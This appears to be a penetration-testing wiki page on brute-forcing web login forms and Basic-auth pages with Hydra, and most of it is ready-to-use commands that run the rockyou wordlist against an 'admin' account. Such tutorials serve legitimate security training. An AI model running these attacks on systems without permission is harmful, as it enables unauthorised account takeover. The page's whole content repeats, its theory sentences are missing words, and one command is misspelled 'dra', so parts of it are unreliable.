Brute-Force

Last updated 1 year ago

Was this helpful?

Theory

We may attempt to brute-force a web service as we may not be able to fully interact with it without credentials. Most web services come with a default user account such as admin and may use .

For our brute-force attack, it will dramatically increase our chances of success and reduce the expected duration of our attack. We even may for this purpose.

Practice

We can use Hydra to perform such attack on HTTP/HTTPS forms. We might use following methods:

http-get-form, in case of an http page with a get form
https-get-form, in case of an https page with a get form
http-post-form, in case of an http page with a post form
https-post-form, in case of an https page with a post form

This methods take parameters in the following format

<Path_To_Login_Form>:<Post_Data>:<Incorrect/Correct_String_Params>

# -l : username
# -P : password list
# http(s)-*-form : "<Path_To_Login_Form>:<Post_Data>:<Incorrect_String>
# -s : Specify a port 

# Find on error
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=^USER^&password=^PASS^:Login failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 <IP> http-post-form "/login.php:user=^USER^&password=^PASS^:Login failed"

# Find on success
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> https-post-form "/login.php:user=^USER^&password=^PASS^:S=302"
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get-form "/login.php:user=^USER^&password=^PASS^:S=Success!"

We can use Hydra to perform such attack on HTTP/HTTPS websites using Basic auth. We might use following methods:

http-get, in case of an http page with basic auth.
https-get, in case of an https page with with basic auth.

# -l : username
# -P : password list
# http(s)-get : "<Path_To_Protected_Page>"
# -s : Specify a port 

# HTTP
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get "/page_url"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 <IP> http-get "/page_url"

# HTTPS
dra -l admin -P /usr/share/wordlists/rockyou.txt <IP> https-get "/page_url"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 4434 <IP> https-get "/page_url"

Theory

We may attempt to brute-force a web service as we may not be able to fully interact with it without credentials. Most web services come with a default user account such as admin and may use .

For our brute-force attack, it will dramatically increase our chances of success and reduce the expected duration of our attack. We even may for this purpose.

Practice

We can use Hydra to perform such attack on HTTP/HTTPS forms. We might use following methods:

http-get-form, in case of an http page with a get form
https-get-form, in case of an https page with a get form
http-post-form, in case of an http page with a post form
https-post-form, in case of an https page with a post form

This methods take parameters in the following format

<Path_To_Login_Form>:<Post_Data>:<Incorrect/Correct_String_Params>

# -l : username
# -P : password list
# http(s)-*-form : "<Path_To_Login_Form>:<Post_Data>:<Incorrect_String>
# -s : Specify a port 

# Find on error
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=^USER^&password=^PASS^:Login failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 <IP> http-post-form "/login.php:user=^USER^&password=^PASS^:Login failed"

# Find on success
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> https-post-form "/login.php:user=^USER^&password=^PASS^:S=302"
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get-form "/login.php:user=^USER^&password=^PASS^:S=Success!"

We can use Hydra to perform such attack on HTTP/HTTPS websites using Basic auth. We might use following methods:

http-get, in case of an http page with basic auth.
https-get, in case of an https page with with basic auth.

# -l : username
# -P : password list
# http(s)-get : "<Path_To_Protected_Page>"
# -s : Specify a port 

# HTTP
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get "/page_url"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 <IP> http-get "/page_url"

# HTTPS
dra -l admin -P /usr/share/wordlists/rockyou.txt <IP> https-get "/page_url"
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 4434 <IP> https-get "/page_url"

Brute-Force

Brute-Force

Theory

Practice

Resources

Theory

Practice

Resources